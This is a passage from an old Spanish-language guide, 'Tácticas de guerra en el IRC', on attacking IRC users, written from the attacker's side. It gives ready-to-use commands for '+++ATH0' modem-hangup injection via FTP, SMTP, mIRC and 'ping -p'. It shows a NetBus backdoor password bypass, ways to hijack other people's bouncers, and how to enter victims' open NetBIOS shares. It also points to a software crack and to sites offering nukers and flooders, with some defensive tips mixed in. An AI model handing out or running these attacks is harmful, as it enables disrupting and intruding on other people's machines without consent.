cuidado con ellos porque muchos no son mßs que nuevos troyanos (ej.: "BOsniffer.zip" o "*.exe").
La manera mßs fßcil y c≤moda de detectar / eliminar este back-door es usando un anti-virus
actualizado, como puede ser el "AntiViral Toolkit Pro" (AVP):
http://www.avp.ru/ (pßgina oficial)
http://www.ontinet.com/avp/avp.htm (versi≤n en castellano)
* C≤mo determinar la configuraci≤n de un BO instalado: ver el fichero del servidor usando un
editor de texto (como el "Bloc de notas"). Si la ·ltima linea del fichero es
'8 8$8(8,8084888<8@8D8H8L8P8T8X8\8'8d8h8l8' entonces estß usando la configuraci≤n
por defecto. En caso contrario, la configuraci≤n estarß en las ·ltimas lineas del fichero,
en este orden:
<nombre del fichero>
<descripci≤n del servicio>
<n·mero de puerto>
<password>
<informaci≤n sobre plug-in adicional>
* Plug-in's: se trata de c≤digo que a±ade funcionalidad extra al servidor. Se conocen como
"BUTTplugs". Asφ por ejemplo existe un plug-in que hace que la vφctima conecte secretamente a
un servidor y canal (ej.: #bo_owned en EFNET) de IRC dado, anuncißndose ante los demßs
usuarios del canal como infectados. De esta forma, el atacante puede conectar a dicho servidor
y canal de IRC (que se supone previamente conocido), y encontrarse las IP's de numerosas
vφctimas.
Algunos plug-in's conocidos:
- Speakeasy: es el comentado del IRC.
- Silk Rope: enlaza el BO a casi cualquier programa existente.
- Saran Wrap: esconde el BO dentro de un programa instalador estßndar "InstallShield".
- Butt Trumpet: manda al atacante un email con la direcci≤n IP de la mßquina vφctima, una vez
que BO se ha instalado.
Aquφ podeis encontrar los ·ltimos plug-in's:
http://www.cultdeadcow.com/tools/bo_plugins.html
* ┌ltimamente se han descubierto evidencias que nos inclina a pensar que tambiΘn el programa
cliente del BO puede ser un back-door en favor de los creadores del programa. Si
monitorizamos el trßfico de red mientras corremos este programa (con un "netstat", sin ir
mßs lejos) se puede observar que se abre una conexi≤n hacia el puerto 80 (httpd) del site de
los creadores del programa, lo que en principio parece no tener demasiado sentido en lo que
respecta a las funciones del cliente.
3.14.4.- NetBus.-
Se trata de una herramienta similar al BO, en ciertos aspectos incluso mßs avanzada, ya que
aparte de soportar todas las funciones del BO, presenta funcionalidades extra como pueden ser
abrir/cerrar la unidad de CDROM, mandar cuadros de dißlogo interactivos para poder hacer
chat con el sistema comprometido o escuchar el micr≤fono de dicho sistema. Funciona en Windows
95 / 98 / NT.
Esta es la pßgina oficial del programa:
http://members.spree.com/SIP/NetBus/
NetBus escucha los puertos 12345 y 12346 de TCP. No usa encriptaci≤n y los comandos tienen el
siguiente formato:
<Comando>;<Arg1>;<Arg2>;...;<Argn>
Por defecto, el servidor NetBus se llama "Patch.exe". Es posible ponerle password, el cual se
guardarφa sin cifrar en la entrada de registro "HKEY_CURRENT_USER\Patch\Settings\ServerPwd".
El cliente se autentificarφa mandando una cadena con el formato "Password;0;mi_password",
aunque si en vez de un 0 ponemos un 1, conseguiremos autentificarnos con cualquier password.
Esto es un back-door que contiene el propio programa.
* C≤mo detectarlo:
C:\WINDOWS>netstat -an | find "12345"
TCP 0.0.0.0:12345 *:*
* C≤mo eliminarlo: hay diferentes formas para hacerlo, dependiendo de la versi≤n de que se
trate.
Versi≤n 1.5x:
http://members.spree.com/NetBus/remove_1.html
Versi≤n 1.6:
http://members.spree.com/NetBus/remove_2.html
Para esta ·ltima versi≤n, tambiΘn es posible eliminarlo remotamente haciendo telnet al puerto
12345 y mandando lo siguiente (sin las comillas):
"Password;1;"<Enter>"RemoveServer;1"<Enter>
Esto ·ltimo funciona incluso existiendo password, aunque no se borra el fichero .exe, lo que
deberß hacerse manualmente.
* Al igual que ocurrφa con el BO, lo mßs c≤modo para detectar / eliminar este back-door es
usar un anti-virus actualizado, como puede ser el "AntiViral Toolkit Pro <
http://www.avp.ru/>"
(AVP).
3.15.- Hanson.
Afecta al cliente mIRC 5.3x con el puerto 113 (ident) abierto. Se consigue matar al programa
cliente o ralentizar mucho el sistema (Windows 95/NT). La idea es mandar al puerto
especificado cadenas mßs largas de las que admite el buffer interno de mIRC provocando un
"crash" del programa.
3.16.- Modem DoS.-
Las tΘcnicas que a continuaci≤n paso a explicar atacan directamente al modem o al puerto al
cual estß conectado el mismo y consiguen romper la conexi≤n con nuestro ISP.
3.16.1.- /Msg ComX.-
Funciona con algunos clientes de IRC (preferentemente en versiones antiguas). Consiste en
que cualquier mensaje (via /msg) que se envφe a un usuario cuyo nick coincida con un nombre
l≤gico de puerto (com1, com2, ..., lpt1, ..., aux, ...) es directamente enviado al puerto en
cuesti≤n y no al usuario de IRC. Estamos, pues, mandando datos arbitrarios a un puerto, lo
cual tendrß resultados impredecibles y conducirß a error. Si el puerto usado es aquel al cual
estß conectado el modem (usualmente com2), estropearemos la conexi≤n que se estuviera llevando
a cabo en ese momento. Queda claro que la vφctima de este bug es quien realiza el /msg; por
tanto, nuestra intenci≤n como atacante serß enga±ar a la vφctima para que mande ese /msg.
* Ejemplo:
Atacante:
/nick com1
/msg victima Oye, ┐estßs ahφ?
Vφctima:
/msg com1 Sφ, dime.
(ahora si todo va bien se le habrß colgado el rat≤n, que es el dispositivo que suele estar en
com1).
Atacante:
/nick com2
/msg victima ┐Me respondes o no?
Victima:
/msg com2 íYa lo he hecho antes!
(ahora se habrß quedado sin conexi≤n, puesto que com2 suele ser normalmente el modem).
* La mejor forma de evitar este ataque es tener un cliente mφnimamente actualizado. Otra
posible manera es ignorar los mensajes del atacante, para no caer en tentaci≤n :-). Por
ejemplo, poniendo en /ignore a com1!*@*, com2!*@*, Θtc.
3.16.2.- +++ATH0.-
Este es un viejo ataque pero que sorprendentemente sigue siendo perfectamente vßlido para
colgar un modem (y por tanto, la conexi≤n al ISP) en muchas ocasiones. Es bastante poderoso,
asφ que por favor, no abuses de Θl.
Para comprender su funcionamiento hay que explicar antes algo sobre modems. Vamos a ello.
La mayorφa de modems usan un juego de comandos conocido como "Hayes". A travΘs de estos
comandos se puede enviar cualquier orden interna al modem o incluso configurarlo.
Un comando-ejemplo muy conocido es "ATDTxxxxxx", que le indica al modem que marque por
tonos el n·mero xxxxxx.
El comando que nos serß de utilidad ahora serß "ATH0". La respuesta del modem a este
comando es que rompe la conexi≤n actual, o sea, "cuelga el telΘfono". Si logramos que la
vφctima mande ese comando a su propio modem, Θste desconectarß. Esa es la idea.
Para que el modem entienda que los datos que se le estß mandando son comandos, Θste debe
estar en lo que se conoce como "modo de comandos". Sin embargo, nosotros vamos a intentar
mandar el comando estando el modem ya conectado al ISP y funcionando, por lo que Θste no
estß en principio aceptando comandos sino "datos". Tenemos que, de alguna forma, forzar a
que el modem entre en el modo de comandos. Para Θsto, basta con lanzar una secuencia de
"c≤digos de escape". Esta secuencia o evento fuerza a que se conmute al modo de comandos,
de forma que los datos que vengan a continuaci≤n el modem los entiende como comandos. El
c≤digo de escape estß definido en el registro S2 del modem y por defecto, es el 43 ("+"), de
forma que la secuencia para entrar en modo de comandos es "+++". Detrßs irφa el comando a
lanzar, que seg·n lo visto, va a ser un "ATH0". Asφ y con todo, la cadena de caracteres
completa que la vφctima debe enviar a su modem queda como "+++ATH0", que es el nombre que
usualmente se da al ataque.
Visto Θsto, queda por saber c≤mo podemos aprovecharnos de esta caracterφstica.
┐C≤mo podemos lograr que la vφctima mande esa cadena a su propio modem?
Basßndonos en que el protocolo PPP, que es el normalmente usado para conectar por modem
a nuestro ISP, por defecto no comprime los paquetes IP que viajan sobre Θl, si la vφctima
manda un paquete IP de datos hacia el exterior que contenga la cadena "+++ATH0", lo que
ocurrirß es que dicho paquete se encapsularß en una o varias tramas PPP, y dichas tramas
se enviarßn hacia el modem, para que Θste las transmita por la linea telef≤nica, pasando la
cadena "+++ATH0" de forma transparente a travΘs del modem. Entonces el modem interpretarß el
"+++" como la secuencia de escape y ejecutarß el comando "ATH0", que viene a continuaci≤n,
que obliga al modem a desconectar.
Desde el punto de vista del atacante, para forzar a que la vφctima mande la cadena "+++ATH0",
hay muchas maneras posibles. Veamos unos ejemplos.
* Ejemplo 1:
[maquina@atacante]$ telnet 192.168.1.1 21
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Dec 12
20:41:
USER +++ATH0
^]
telnet> close
Connection closed.
[maquina@atacante]$ telnet 192.168.1.1 21
Trying 192.168.1.1...
telnet: Unable to connect to remote host: Network is unreachable
[maquina@atacante]$
La explicaci≤n es simple. Hemos hecho un ftp via telnet. Cuando nos ha preguntado el usuario,
le hemos dicho que era "+++ATH0". Acto seguido el servidor ftp, o sea, la vφctima, debi≤
responder con algo como "331 Password required for +++ATH0.". Vemos que la vφctima ha mandado
sin querer la temida cadena para que el modem cuelgue ;-).
* Ejemplo 2:
Conectamos al puerto 25 ("sendmail") de la vφctima y le mandamos:
HELO blah.com
VRFY +++ATH0
La vφctima mandarφa la malΘfica cadena en una respuesta como:
550 +++ATH0... User unknown
* Ejemplo 3:
Desde mIRC:
//raw NOTICE NickVictima : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
* Ejemplo 4:
[maquina@atacante]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
[maquina@atacante]#
La opci≤n "-p" permite especificar un "pattern" que servirß para rellenar el paquete de ping
("ICMP ECHO_REQUEST"). La vφctima responderß con un "ICMP ECHO_REPLY", conteniendo el mismo
pattern. El pattern estß codificado en hexadecimal y se traduce como "+++ATH0<CR>". No todos
los programas de ping soportan esta opci≤n.
- - - - - -
* Nota: en todos los casos, el atacante tambiΘn envφa la cadena "+++ATH0", por lo cual si
Θste es vulnerable, su modem caerß y el ataque se habrß vuelto contra el propio atacante.
* Modems vulnerables: no todos los modems son vulnerables a este ataque. Los modems "buenos",
o sea, que soportan "Hayes" estrictamente (la patente) no son vulnerables. Esto es porque la
norma especifica que despuΘs de recibir la secuencia de escape y antes de ning·n comando, debe
pasar un intervalo de tiempo "vacφo" de 1 seg. L≤gicamente, en nuestro ataque va todo
(secuencia + comando) seguido, sin pausa, por lo que el ataque no serφa efectivo. Un ejemplo
de modem no vulnerable es el US Robotics.
Sin embargo, hay otros muchos modems que no siguen la patente; en particular, parece que
todos aquellos que contienen el chipset Rockwell, que son bastante frecuentes hoy en dφa.
Ejemplo: Diamond SupraExpress 56k.
* En todo caso, una forma de protegerse es deshabilitar la entrada manual al modo de comandos.
Esto se hace cambiando el c≤digo de escape (que por defecto es un 43 ["+"]), y poniendo un
valor de 255. La mayorφa de los modems reconocen un valor por encima de 127 como deshabilitador
manual del modo de comandos, pero otros necesitan un valor superior. Para estar mßs seguros,
usamos 255. El comando completo serφa:
ATS2=255
y se podrφa introducir en la cadena de inicializaci≤n del modem (configurable normalmente en
propiedades del modem o en la utilidad de dial-up), de forma que se "ejecute" siempre antes
de marcar hacia nuestro ISP.
* TambiΘn es posible parchear remotamente un host dado usando la misma tΘcnica del "ping -p"
vista para atacar:
ping -c 1 -p 2b2b2b415453323d32353526574f310d host
(el pattern usado equivale a: "+++ATS2=255&WO1").
De forma anßloga, podemos mandar otros comandos remotos, provocando, por ejemplo, que el modem
de la vφctima marque a donde nosotros queramos, Θtc. íMuy peligroso!
4.- Spoofing.
Esta tΘcnica no es un ataque en sφ pero permite mejorar y perfeccionar cualquier ataque
(de los anteriores, por ejemplo). TambiΘn puede ser la base de alg·n ataque, como ocurre
con el IP Spoofing que los hackers suelen emplear (me desviarφa del tema de este escrito
si siguiese escribiendo...).
Se trata de "spoofear" (=falsear) la direcci≤n IP de origen de los paquetes que se mandan a
la vφctima, de forma que Θsta crea que el origen de dichos paquetes es otro (el que nosotros
le indiquemos). De esta forma protegemos nuestro anonimato, y en general podemos llevar a cabo
cualquier acci≤n que se nos pueda ocurrir y que se derive de una falsa direcci≤n source
(origen). Por ejemplo, podemos nukear a alguien, con la direcci≤n fuente de otro, haciendo
creer a la vφctima (si Θsta tiene un analizador de paquetes o algo parecido) que es el otro
el que le estß atacando }:-).
El spoofing es (o podrφa ser) una funcionalidad mßs del programa de ataque (del nuker, del
ping, ...). Como consiste en manejar IP desde un muy bajo nivel en muchos casos se requieren
privilegios especiales. Por ejemplo, en el caso de mßquinas Unix, se necesita abrir
"raw sockets" y Θsto requiere de privilegios de superusuario (root).
Para los interesados en el tema os remito a las siguientes direcciones:
* IP-spoofing Demystified Trust-Relationship Exploitation by daemon9 / route / infinity
<
http://www.fc.net/phrack/files/p48/p48-14.html>
* IPSPOOF.C (Spoofing source)
<
http://www.ilf.net/Toast/files/unix/ipspoof.c>
* This site contains both spoofing code, an analysis of that spoofing code and a good
description of how to implement such attacks:
~
http://main.succeed.net/~coder/spoofit/spoofit.html
5.- TΘcnicas avanzadas.
Aquφ me propongo a describir con la mayor simplicidad posible algunas tΘcnicas mßs o menos
avanzadas (algunas son realmente difφciles de implementar y suelen ser usadas por hackers)
para que por lo menos sepais de su existencia.
5.1.- Bouncing.-
Consiste en usar una mßquina (host) intermedia para mantener una comunicaci≤n TCP "virtual"
entre dos mßquinas (situadas una a cada lado). El esquema serφa algo asφ como:
Host A <---> Bouncer <---> Host B
(1) (2)
Todos los datos que A tiene para B son enviados al bouncer. Este se encarga de reenviarlos
a su destino (B). De igual forma ocurre en el otro sentido. El bouncer act·a de elemento
redireccionador en ambos sentidos.
La mßquina intermedia corre un programa especial (daemon) llamado "bouncer". A menudo nos
referiremos tambiΘn con el mismo tΘrmino a la mßquina intermedia (i.e. la que corre el soft
especial), de la misma forma que se ha asumido al dibujar el esquema. Dicho programa usa dos
puertos TCP previamente definidos, uno por cada conexi≤n (A<->Bouncer, Bouncer<->B), y hace
de pasarela entre ellos (tal y como se ha explicado). Por tanto, mantiene por separado dos
conexiones TCP diferentes pero las "enlaza" de forma que en su conjunto parezca una ·nica
conexi≤n TCP (de ahφ lo de "virtual") entre A y B.
La ventaja que Θsto conlleva es que ocultamos nuestra identidad a los ojos de B, ya que Θste
solo ve la comunicaci≤n que mantiene con el host intermedio (2) (y no tiene por quΘ saber que
se trata de un host haciendo de bouncer).
A esta tΘcnica se le puede dar diferentes usos, todos ellos basßndonos en la principal ventaja
descrita en el pßrrafo anterior. En lo que al IRC concierne es ampliamente usada para saltar
bans o K/G-Lines. Lo vemos con un ejemplo. Supongamos que nosotros somos el host A y que no
podemos entrar a ning·n servidor (B) de una red IRC por estar baneados permanentemente. ┐QuΘ
hacer? Pues hacemos uso de una shell en otro host (que va a ser el intermedio) y colocamos
allφ un bouncer. Al programa, que se quedarß corriendo en segundo plano (background), le
tenemos que dar dos datos: el puerto que estarß permanentemente escuchando (por donde recibirß
nuestra conexi≤n) y el host y puerto destino (a donde intentarß conectarse) correspondientes a
B. Ahora, cuando queramos conectarnos al IRC lo hacemos al primero de los puertos predefinidos
(correspondiente al host que alberga el bouncer). Automßticamente el bouncer redireccionarß
nuestra petici≤n hacia B (el servidor IRC) y estaremos dentro (ísaltßndonos el ban o lo que
sea!) ya que hemos llegado a travΘs de un host que no tenφa ning·n ban. A todos los efectos el
servidor IRC cree que nuestro host es el bouncer. Asφ, al hacernos cualquier otro usuario un
/whois íverß el hostname del bouncer! (Θsto es otra ventaja ya que no nos pueden mandar
ataques como OOB's o Sspings, por no saber nuestra verdadera direcci≤n IP). Es una buena forma
de garantizar nuestro anonimato =).
Hay que tener en cuenta que un bouncer es algo fßcil de "robar":
1.- Exploramos la red IRC en busca de alg·n usuario que estΘ usando bouncer. Para ello basta
con hacer /whois a distintos usuarios y fijarnos en el hostname que nos sale. Podemos
asumir que presumiblemente se trata de un bouncer si es una IP fija (alguna mßquina de una
universidad, por ejemplo) y al hacer /finger @host no vemos ning·n usuario conectado.
Esto ·ltimo no siempre se puede ver ya que muchos hosts deshabilitan este servicio por
el potencial problema de seguridad que puede acarrear.
2.- Hacemos un PortScan a dicho host (se van mandando sucesivas peticiones de conexi≤n TCP
a los distintos puertos de la vφctima, recorriendo el rango de puertos deseado, y a la
vez escuchando las respuestas que nos llegan; s≤lo contestarßn los puertos "activos" asφ
que es una manera de ver los puertos abiertos que tiene una mßquina).
3.- Normalmente un bouncer se coloca en los puertos no privilegiados (es decir, a partir del
1024), tφpicamente en el rango 1024 a 10000, por decir algo, aunque en realidad en
principio no hay ninguna restricci≤n en cuanto al n·mero de puerto usado. Asφ que podemos
seleccionar a ojo unos cuantos puertos que son candidatos posibles a bouncer :).
4.- Intentamos conectarnos a dichos puertos con nuestro cliente IRC habitual y vemos si
alguno/s lo hace/n.
5.- Si conseguimos entrar al IRC por alguno de esos puertos ya tenemos bouncer =).
Para evitar abusos como el anterior se suele usar alg·n tipo de autentificaci≤n en el bouncer,
como podrφa ser poner password de entrada.
5.2.- Wingate.-
Wingate es un programa com·nmente usado para dar conectividad a Internet a varios ordenadores
usando un ·nico modem. (supongo que tendrß mßs funciones pero tampoco interesa para nuestros
prop≤sitos). Es un programa bastante peligroso por los problemas de seguridad que implica, al
menos en versiones no muy modernas.
Uno de los bugs que tiene es que permite acceso vφa puerto 23 (telnet) sin pedir password y
desde ahφ se puede saltar a cualquier otra mßquina. Es decir, podemos usar Wingate para hacer
bouncing sin necesidad de preocuparnos de buscar o hackear una shell de por ahφ =).
Por tanto, la cosa es tan fßcil como encontrar alg·n host que corra Wingate (que los hay).
TambiΘn hay otro bug que te permite el acceso al HD del host corriendo Wingate aunque no serß
materia de este artφculo al no tener nada que ver con el IRC. Busca en pßginas de hack :-P.
Soluci≤n: aparte de usar siempre la ·ltima versi≤n de Wingate, aconsejo mejor usar otras
alternativas mßs eficientes, menos peligrosas y mßs baratas como puede ser un Linux corriendo
IP-masquerade.
5.3.- DNS Inject.-
Con esta tΘcnica conseguimos spoofear nuestro hostname, es decir, que un servidor nos asocie
el nombre de host que queramos (y no el que tiene realmente, que es ·nico) (en realidad, puede
haber mßs de uno, pero s≤lo uno es el real, lo que se conoce como "canonical name" mientras
que los demßs son simples "aliases").
La explicaci≤n detallada es compleja y excede los objetivos de este documento. A tφtulo
informativo paso a esbozar o perfilar lo que serφa el Inject.
Cada servidor (ya sea de IRC, ftp, Θtc) tiene asociado uno o mßs "servidores de nombres"
(NS, del inglΘs: Name Server) que resuelven todas las peticiones de conexi≤n que le llegan:
para cada IP que peticiona conexi≤n buscan y almacenan el hostname correspondiente para su
posterior uso. El proceso serφa el siguiente:
- un usuario de la mßquina A intenta conectarse a un puerto de la mßquina B (el servidor IRC,
ftp, ...).
- B recibe la direcci≤n IP desde la que peticionamos (la de A) y se la entrega a C (otro host:
el NS) para que la resuelva.
- C resuelve y devuelve su respuesta a B.
- B se "cree" la respuesta y la cachea en memoria. Ahora tiene un par IP-hostname. A partir de
este momento nosotros estamos identificados en el servidor con el hostname dado anteriormente
por el NS.
Como se puede intuir el truco estß en forzar al NS a que de una respuesta falsa (siempre en
favor nuestro :-)). Digamos que modificamos los datos del NS para que responda a nuestra IP
con el hostname que nosotros queremos y no con el que deberφa hacerlo realmente. Se dice que
hemos "inyectado" (injectado, en inglΘs :-P) el NS.
El c≤mo hacer esto ·ltimo es lo complicado y s≤lo voy a decir que el truco se basa en la
"resoluci≤n recursiva" de los NS (cuando un NS no sabe la respuesta a la petici≤n que le ha
llegado lanza una nueva petici≤n a otro NS, que posiblemente sφ sepa la respuesta, y asφ
sucesivamente --> de ahφ la "recursividad") y en tener finalmente un NS trucado que de
respuestas falsas y que nosotros reprogramamos a nuestro gusto.
La principal ventaja es una vez mßs el anonimato (aparte de poder ir vacilando por el IRC con
una identidad del tipo
[email protected] :-O).
5.4.- Recursos compartidos.-
El protocolo Netbios permite compartir recursos (impresoras, discos duros, Θtc) de un ordenador
con otros conectados al primero a travΘs de la red. De esta forma, podemos acceder remotamente
a los recursos de una mßquina dada: leer ficheros, modificarlos, escribirlos, enviar alg·n
documento a una impresora remota... El abanico de posibilidades es amplio.
Los problemas vienen cuando este servicio estß disponible "p·blicamente" sin contrase±a de
acceso: nuestro disco duro estarß "abierto al p·blico" }:-). Cualquier hacker podrß leer
ficheros nuestros, borrarlos, introducir troyanos... en fφn, nada bueno.
Un gran fallo de Windows 95 (corregido en versiones posteriores, creo que a partir del OSR2)
es que los recursos no tienen password por defecto con lo cual si activamos Netbios, ya sea
para utilizarlo o por descuido, y se nos olvida proteger los recursos con password tendremos
un gran agujero de seguridad en nuestra mßquina. Esto no ocurre asφ en Windows 98 ni
Windows NT.
A pesar de que este problema es ampliamente conocido todavφa se ve por el IRC a mucha gente
con su disco duro compartido (ípobres... y ellos sin saberlo!).
Los pasos para ver si una mßquina (IP) dada comparte recursos y para utilizarlos son,
*desde Windows NT*, los siguientes:
1.- Asegurarnos de que tenemos el soporte Netbios instalado.
2.- Desde el shell (command.com, ndos, 4dos, Θtc) hacer:
c:\> nbtstat -A 195.69.69.69
Notas:
- la IP dada se supone que es la de la vφctima
- es importante poner -A y no -a
- no vale un hostname, s≤lo direcci≤n IP.
3.- Para que tengamos posibilidades deberß salir algo como lo siguiente:
NetBIOS Remote Machine Name Table
Nombre Tipo Estado
---------------------------------------------
SKORPIO <03> UNIQUE Registrado
ADMINISTRADOR <03> UNIQUE Registrado
SKORPIO <00> UNIQUE Registrado
INSULTOZ <00> GROUP Registrado
SKORPIO <20> UNIQUE Registrado
Direcci≤n MAC = 00-00-00-00-00-00
Debe haber al menos una entrada de tipo <20> para que tengamos algo que hacer ;-).
4.- Men· Inicio -> Ejecutar. Introducimos en el cuadro de dißlogo:
\\195.69.69.69
5.- Ahora puede que nos aparezca otro cuadro de dißlogo solicitßndonos contrase±a (en cuyo
caso en principio no tenemos nada que hacer... aunque podrφamos intentar passwords comunes
como el nombre o nick de la persona, Θtc) o bien directamente se abrirß una nueva ventana
donde se muestran los recursos compartidos. Pinchando sobre el que queramos tendremos acceso
a Θl.
La soluci≤n a este grave problema de seguridad es tan simple como proteger los recursos con
contrase±a o simplemente no activar el servicio Netbios si no se va a necesitar. TambiΘn podemos bloquear los puertos que ofrecen este servicio (en especial el 139) mediante firewall.
6.- Defensa.
En esta secci≤n me gustarφa dar unas pinceladas generales acerca de c≤mo defendernos de
ataques e intrusiones. Las formas de defensa ante determinados ataques en particular no se
tratan aquφ pues se suponen cubiertas en los distintos apartados correspondientes a los
ataques.
6.1.- Firewall.-
Un "firewall" o "muro de fuego" es un programa (software o hardware) que filtra los paquetes
que entran o salen a travΘs de los distintos interfaces de red seleccionados, en base a unas
reglas ("rules") previamente definidas.
Se tienen 2 tipos de reglas:
- de entrada: afectan a los paquetes entrantes, es decir, a los que provienen del exterior.
- de salida: afectan a los paquetes salientes, es decir, que van hacia el exterior.
Otra clasificaci≤n es:
- "accept": si el paquete cumple los requisitos dados por la regla Θste se dejarß pasar.
- "deny" o "ignore": si el paquete cumple los requisitos dados por la regla Θste no se dejarß
pasar (se ignorarß).
- "reject": si el paquete cumple los requisitos dados por la regla Θste no se dejarß pasar y
ademßs se notificarß al remitente del paquete el correspondiente mensaje de error.
Entre otras cosas, lo que caracteriza a un firewall es la flexibilidad a la hora de decidir
si un paquete debe atravesar o no el firewall, o lo que es lo mismo, la capacidad de definir
y tratar diferentes reglas para reflejar diferentes situaciones.
Las reglas se pueden basar en cualquiera de los campos que pueda tener un paquete: tipo de
paquete, longitud, protocolo, direcci≤n origen, direcci≤n destino, Θtc. TambiΘn es posible
combinar varios de ellos. Por ejemplo, una regla podrφa ser: "no dejar pasar paquetes IP
entrantes provinientes de la subred IP 195.69.69.* y que vayan destinados al puerto 23 TCP".
En este caso tendrφamos una regla de entrada que bloquea el servicio telnet (habitual del
puerto 23).
Ademßs de las funciones de bloqueo, un firewall suele tener funciones a±adidas como el logeo
de los distintos eventos que ocurran (por ej. "se ha tirado [drop] el paquete proviniente de
tal direcci≤n en base a la regla x").
Centrßndonos en el tema que nos concierne -el IRC- podemos usarlo por ejemplo para filtrar
client icmp-nukes. La idea es a±adir una regla de entrada diciendo algo asφ como
"ignorar todos los paquetes ICMP de tipo unprotocol" (en este caso filtrarφamos el nuke
normal y no otros tipos).
┐QuΘ firewall es el mejor para nuestros prop≤sitos? Deberφamos buscar algo a la vez flexible
y simple (caracterφsticas que suelen ir enfrentadas; habrß que llegar a un compromiso entre
las dos), que cumpla con nuestros requisitos de la forma mßs eficiente, funcione con nuestro
modem o tarjeta de red y que sea lo mßs barato posible. La pen·ltima caracterφstica es muy
importante ya que muchos firewalls no tienen soporte para modem y s≤lo funcionan con tarjeta
de red, la cual no es habitual que se tenga si ·nicamente tenemos un ordenador conectado a
Internet por PPP mediante alg·n ISP.
Hay diversas ofertas y no voy a tratarlas todas. Tan s≤lo aconsejarΘ unos cuantas y darΘ las
razones que me han llevado a ello.
En Linux se puede usar el paquete "ipfwadm", que viene por defecto en la mayorφa de
distribuciones. Es un poco tedioso a la hora de configurar pero es totalmente gratuito.
Para Windows 95 la mayorφa de usuarios optan por el "ConSeal PC fw <
http://www.signal9.com>",
que es fßcil de usar y que aunque es comercial se puede descargar de la web en versi≤n demo y
aplicarle el siguiente crack <ircutils/conseal.zip> (v.1.0) para hacerlo totalmente operativo
de forma gratuita. Advierto que el uso de cracks estß penado por la ley (pero no el hecho de
tenerlos). Ya que este crack estß ampliamente difundido por la Red he pensado que no estß de
mßs facilitar la tarea de b·squeda a nuestros queridos lectores :-).
En Windows NT he tenido mßs problemas para buscar firewall, aunque al final... :-). El
problema es que no se encuentran por ning·n lado serials/cracks para los firewalls existentes
o en caso de haberlos no soporta el uso de modem. Por nombrar algunos de los mejores y que
creo que soportan modem tenemos:
- "Check Point FireWall-1 <
http://www.checkpoint.com>"
- "TIS Gaunlet <
http://www.tis.com>"
- "NetGuard Guardian <
http://www.ntguard.com>"
- "ConSeal PC fw <
http://www.signal9.com>"
7.- Resources.
Este apartado estß dedicado, brevemente, a los distintos programas disponibles y ·tiles a
nuestra causa :-).
Por ahora no voy a subir ning·n programa a este servidor ya que puedes encontrar *TODO* tipo
de programas de IRC-War (icmp-nukers, bouncers, flooders, link-lookers, port-listeners,
port-bombers, port-scanners, Θtc) en:
<
http://www.warforge.com/dos/index.html>.
PodrΘis encontrar muchφsimos scripts para mIRC y una secci≤n interesante sobre el bot Eggdrop
en: <
http://www.xcalibre.com>.
Los ·ltimos exploits y programas que explotan los bugs mßs recientes aparecen en:
<
http://www.rootshell.com>.
<
http://www.insecure.org>.
Como he visto que hay interΘs por el tema del "DNS-Inject" y no estoy por la labor de ampliar
dicho apartado (perdonad la flojera: queda prometido para futuras revisiones del doc., sources
incluidos), os remito a un excelente artφculo sobre el tema:
<
http://hispahack.ccc.de/mi004.htm>.
Una herramienta comercial llamada "Aggressor", que permite spoofear y lanzar multitud de
ataques (land, jolt, Θtc) desde Windows la podeis ver en:
<
http://www.aggressor.net>.
Mßs informaci≤n tΘcnica sobre IRC (ataques, defensas y mucho mßs) -todo en espa±ol- y con
multitud de links en:
~
http://www.argo.es/~jcea/irc <
http://www.argo.es/jcea/irc>.
Todo sobre la red Hispana de IRC (servidores, info, Θtc) en:
<
http://www.irc-hispano.org>.
Por ·ltimo me gustarφa recordar la "Home Page" de este documento, donde encontrareis siempre
la versi≤n mßs reciente del mismo (es la que debeis usar en vuestros enlaces). Esta es la
pßgina oficial de "Tßcticas de guerra en el IRC":
~
http://www.esi.us.es/~roman/tacticas.html
8.- Feedback (FAQ).
En este apartado incluirΘ las preguntas mßs frecuentes que me habeis formulado via e-mail
algunos de vosotros, para que no se vuelvan a repetir. No pienso contestar mails de forma
particular asφ que no espereis respuesta sino a la pr≤xima versi≤n del documento. Ni quΘ decir
tiene que antes de preguntar leas esta secci≤n; lo mismo alguien tuvo tu duda antes que t· ;-).
1.- ┐QuΘ script de guerra me aconsejas?
R.- Un script es simplemente algo para simplificar/automatizar tareas. Ning·n script es
realmente imprescindible tanto para atacar como para defenderse, aunque como digo, en
algunos casos sφ que puede facilitar la tarea. En este sentido no deberφamos preocuparnos
tanto por el script que usamos, sino mßs bien de tener nuestro sistema correctamente parcheado
y protegido y de estar al dia en programas/utils de guerra. Hoy en dφa (casi) todos los
scripts cumplen perfectamente en cuanto a defensa se refiere. Para el ataque un script es
tanto mejor cuanto mßs utilidades (=programas) traiga. Por si os sirve de algo yo uso el
7th Sphere 2.666, ya bastante anticuado, pero que me sigue valiendo casi como el primer dφa.
2.- ┐C≤mo puedo compilar los programas que se listan en el artφculo en mi Windows?
R.- Simple: NO puedes. Estos programas estßn escritos para entornos UNIX, asφ que solo podrßs
compilarlos y correrlos en sistemas operativos de esa familia (como por ejemplo, Linux). No
obstante, en algunos casos hay versiones disponibles para otros sistemas operativos. Por
ejemplo, cuando el ataque OOB se puso de moda surgieron diversas utilidades que lo
implementaban desde Win95.
3.- ┐Y d≤nde puedo encontrar dichas utilidades?
R.- En la secci≤n de "resources" hay una URL que es muy buena y donde podrßs encontrar de todo.
Otra opci≤n es utilizar alg·n buscador y localizar alguna pßgina de IRC-War. Los programas
tφpicos se encuentran en la mayorφa de estas pßginas, por muy malas que sean. TambiΘn
puedes buscar webs de H/P/C/V; normalmente todo el material underground se encuentra
focalizado en diversos puntos de la Red centrados ampliamente en esa temßtica. Quiero
decir que donde hay cosas de Hacking suele haber tambiΘn cosas de IRC-War, Phreaking,
Virus, Cracking... en fin, todos esos temas que tanto nos atraen suelen estas relacionados
:-).
4.- ┐C≤mo detectar a alguien que me haga un nuke?
R.- Todos los paquetes que llegan a tu ordenador por el interface de red pueden ser logeados
o "visualizados" con la herramienta correspondiente. Sin embargo, hay que tener en cuenta
que estos paquetes pueden venir falseados (spoofeados) con lo cual la informaci≤n que
